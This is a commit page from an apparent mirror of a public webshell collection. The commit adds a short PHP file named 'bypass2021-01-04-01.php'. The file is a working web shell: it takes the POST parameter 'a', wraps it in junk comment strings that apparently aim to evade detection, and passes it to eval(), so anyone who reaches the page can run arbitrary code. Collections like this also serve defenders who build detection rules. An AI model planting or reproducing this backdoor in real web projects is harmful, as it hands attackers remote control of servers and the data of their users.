mirror of
https://github.com/tennc/webshell.git
synced 2026-01-01 12:29:06 +00:00
Create bypass2021-01-04-01.php
from https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g
This commit is contained in:
11
php/bypass2021-01-04-01.php
Normal file
11
php/bypass2021-01-04-01.php
Normal file
@@ -0,0 +1,11 @@
|
||||
<?php
|
||||
|
||||
function x()
|
||||
{
|
||||
|
||||
return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";
|
||||
|
||||
}
|
||||
|
||||
eval(x());
|
||||
?>
|
||||
Reference in New Issue
Block a user